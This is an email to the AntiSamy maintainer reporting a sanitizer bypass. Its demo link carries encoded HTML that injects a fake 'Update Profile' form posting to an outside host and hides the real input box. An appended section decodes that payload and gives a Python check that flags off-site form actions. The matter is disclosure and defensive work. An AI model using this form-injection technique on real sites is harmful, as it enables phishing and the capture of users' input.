Arshan,<br><br>I found an area of antisamy that can be exploited.&nbsp; It looks like the trouble is that I can insert non-malicious html tags that interact with the page itself.&nbsp; So, while I can&#39;t get malicious javascript into your page, I can create a nice-looking form that redirects to somewhere that does have malicious code.<br>
<br>Here is the link (it&#39;s safe):<br><a href="http://i8jesus.com:9080/AntiSamyDemoWebApp/test.jsp?profile=Please+update+me.+No+really%2C+put+something+in+and+hit+update.%0D%0A%3Ctable%3E%0D%0A%3Ctr%3E%3Ctd%3E%0D%0A%3Ctextarea+rows%3D%223%22+cols%3D%2240%22+name%3D%22profile%22%3E+%3C%2Ftextarea%3E%0D%0A%3C%2Ftd%3E%0D%0A%3Ctd+valign%3D%22top%22%3E%0D%0A%09%3Cform+id%3D%22michaelForm%22+method%3D%22GET%22+action%3D%22http%3A%2F%2Fgoogle.com%2Fsearch%22%3E%0D%0A%09%09%3Cselect+name%3D%22policy%22%3E%0D%0A%09%09%09%3Coption%3Eantisamy-1.1.1.xml%3C%2Foption%3E%0D%0A%09%09%09%3Coption%3Eantisamy-slashdot-1.1.1.xml%3C%2Foption%3E%0D%0A%09%09%09%3Coption%3Eantisamy-ebay-1.1.1.xml%3C%2Foption%3E%0D%0A%09%09%09%3Coption%3Eantisamy-myspace-1.1.1.xml%3C%2Foption%3E%0D%0A%09%09%3C%2Fselect%3E%0D%0A%09%09%3Cinput+type%3D%22hidden%22+name%3D%22q%22+value%3D%22Hi+Arhsan%21%21+Where+should+we+redirect+today%3F%22+%2F%3E%0D%0A%0D%0A%09%09%3Cinput+type%3D%22submit%22+value%3D%22Update+Profile%22%3E%0D%0A%3C%2Ftd%3E%0D%0A%0D%0A%09%3C%2Fform%3E%0D%0A%3C%2Ftable%3E%0D%0A%0D%0A%3Chr%3E%0D%0A%3Ctable+border%3D%220%22+cellpadding%3D%221000%22%3E%0D%0A%3Ctr%3E%3Ctd%3E%3C%2Ftd%3E%3C%2Ftr%3E%0D%0A%0D%0A%3C%2Ftable%3E%0D%0AI+couldn%27t+delete+the+actual+input+box%2C+so+I+just+hid+it+a+bit.+%3A%29&amp;policy=antisamy-1.1.1.xml">http://i8jesus.com:9080/AntiSamyDemoWebApp/test.jsp?profile=Please+update+me.+No+really%2C+put+something+in+and+hit+update.%0D%0A%3Ctable%3E%0D%0A%3Ctr%3E%3Ctd%3E%0D%0A%3Ctextarea+rows%3D%223%22+cols%3D%2240%22+name%3D%22profile%22%3E+%3C%2Ftextarea%3E%0D%0A%3C%2Ftd%3E%0D%0A%3Ctd+valign%3D%22top%22%3E%0D%0A%09%3Cform+id%3D%22michaelForm%22+method%3D%22GET%22+action%3D%22http%3A%2F%2Fgoogle.com%2Fsearch%22%3E%0D%0A%09%09%3Cselect+name%3D%22policy%22%3E%0D%0A%09%09%09%3Coption%3Eantisamy-1.1.1.xml%3C%2Foption%3E%0D%0A%09%09%09%3Coption%3Eantisamy-slashdot-1.1.1.xml%3C%2Foption%3E%0D%0A%09%09%09%3Coption%3Eantisamy-ebay-1.1.1.xml%3C%2Foption%3E%0D%0A%09%09%09%3Coption%3Eantisamy-myspace-1.1.1.xml%3C%2Foption%3E%0D%0A%09%09%3C%2Fselect%3E%0D%0A%09%09%3Cinput+type%3D%22hidden%22+name%3D%22q%22+value%3D%22Hi+Arhsan%21%21+Where+should+we+redirect+today%3F%22+%2F%3E%0D%0A%0D%0A%09%09%3Cinput+type%3D%22submit%22+value%3D%22Update+Profile%22%3E%0D%0A%3C%2Ftd%3E%0D%0A%0D%0A%09%3C%2Fform%3E%0D%0A%3C%2Ftable%3E%0D%0A%0D%0A%3Chr%3E%0D%0A%3Ctable+border%3D%220%22+cellpadding%3D%221000%22%3E%0D%0A%3Ctr%3E%3Ctd%3E%3C%2Ftd%3E%3C%2Ftr%3E%0D%0A%0D%0A%3C%2Ftable%3E%0D%0AI+couldn%27t+delete+the+actual+input+box%2C+so+I+just+hid+it+a+bit.+%3A%29&amp;policy=antisamy-1.1.1.xml</a><br>
<br>Hey, looks like Google knows how to spell your name :)<br><br>Thanks,<br>Michael<br clear="all"><br>-- <br>Michael Coates<br>email: <a href="mailto:mwcoates@gmail.com">mwcoates@gmail.com</a><br><br><a href="http://michaelcoates.wordpress.com">http://michaelcoates.wordpress.com</a>
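<p>The point of the message above is that a sanitizer which whitelists <code>form</code>, <code>select</code> and <code>input</code> will pass markup that contains no script at all yet submits the victim's input to a foreign origin. The block below is an added example, not part of Michael's e-mail and not AntiSamy's own code: it takes the URL-decoded <code>profile</code> parameter from the demo link, walks it with Python's <code>html.parser</code>, and reports every <code>form</code> whose <code>action</code> resolves to an origin other than the page hosting the sanitized content. The origin comparison and the <code>FormFinder</code> helper are assumptions about how one would add such a post-sanitization check; the page URL and the payload are taken from the link in the message.</p>

```python
"""Flag off-site <form> targets surviving in sanitized HTML.

Added example (not from the e-mail above, not from AntiSamy).  The payload is
the URL-decoded ``profile`` parameter of the demo link in the message; the
origin check is an assumed post-sanitization control.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Page that renders the sanitized profile text (host/path from the demo link).
PAGE_URL = "http://i8jesus.com:9080/AntiSamyDemoWebApp/test.jsp"

# Decoded ``profile`` parameter from the demo link: script-free, but the form
# posts the victim's choice to google.com instead of the hosting site.
PAYLOAD = """Please update me. No really, put something in and hit update.
<table>
<tr><td>
<textarea rows="3" cols="40" name="profile"> </textarea>
</td>
<td valign="top">
\t<form id="michaelForm" method="GET" action="http://google.com/search">
\t\t<select name="policy">
\t\t\t<option>antisamy-1.1.1.xml</option>
\t\t\t<option>antisamy-slashdot-1.1.1.xml</option>
\t\t\t<option>antisamy-ebay-1.1.1.xml</option>
\t\t\t<option>antisamy-myspace-1.1.1.xml</option>
\t\t</select>
\t\t<input type="hidden" name="q" value="Hi Arhsan!! Where should we redirect today?" />

\t\t<input type="submit" value="Update Profile">
</td>

\t</form>
</table>

<hr>
<table border="0" cellpadding="1000">
<tr><td></td></tr>

</table>
I couldn't delete the actual input box, so I just hid it a bit. :)
"""


class FormFinder(HTMLParser):
    """Collect every <form> with its action, method and the fields inside it.

    Nesting errors in the payload (</td> before </form>) are tolerated: a form
    stays "open" until its own </form> is seen, which matches how a browser
    would associate the controls with it.
    """

    def __init__(self):
        super().__init__()
        self.forms = []          # list of {"action", "method", "fields"}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "GET").upper(),
                "fields": [],
            }
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            self._current["fields"].append(
                (tag, a.get("type") or "", a.get("name") or ""))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def origin(url):
    """(scheme, host, port) triple used for the same-origin comparison."""
    u = urlsplit(url)
    return (u.scheme.lower(), (u.hostname or "").lower(), u.port)


def off_site_forms(html, page_url):
    """Return the forms in ``html`` whose action is not same-origin with ``page_url``.

    A relative action (e.g. "test.jsp") resolves against the page and is
    therefore allowed; an absolute action on another host is reported.
    """
    page_origin = origin(page_url)
    finder = FormFinder()
    finder.feed(html)
    finder.close()
    return [f for f in finder.forms
            if origin(urljoin(page_url, f["action"])) != page_origin]


if __name__ == "__main__":
    for f in off_site_forms(PAYLOAD, PAGE_URL):
        names = [name for _, _, name in f["fields"]]
        print(f"{f['method']} form submits fields {names} to {f['action']}")
```

<p>Run against the decoded payload this reports a single <code>GET</code> form sending the <code>policy</code> and <code>q</code> fields to <code>http://google.com/search</code>; a form with a relative action on the same host is not reported. The check is a complement to the sanitizer, not a replacement: the simplest fix on the policy side is not to allow <code>form</code> and its controls in user-supplied content at all.</p>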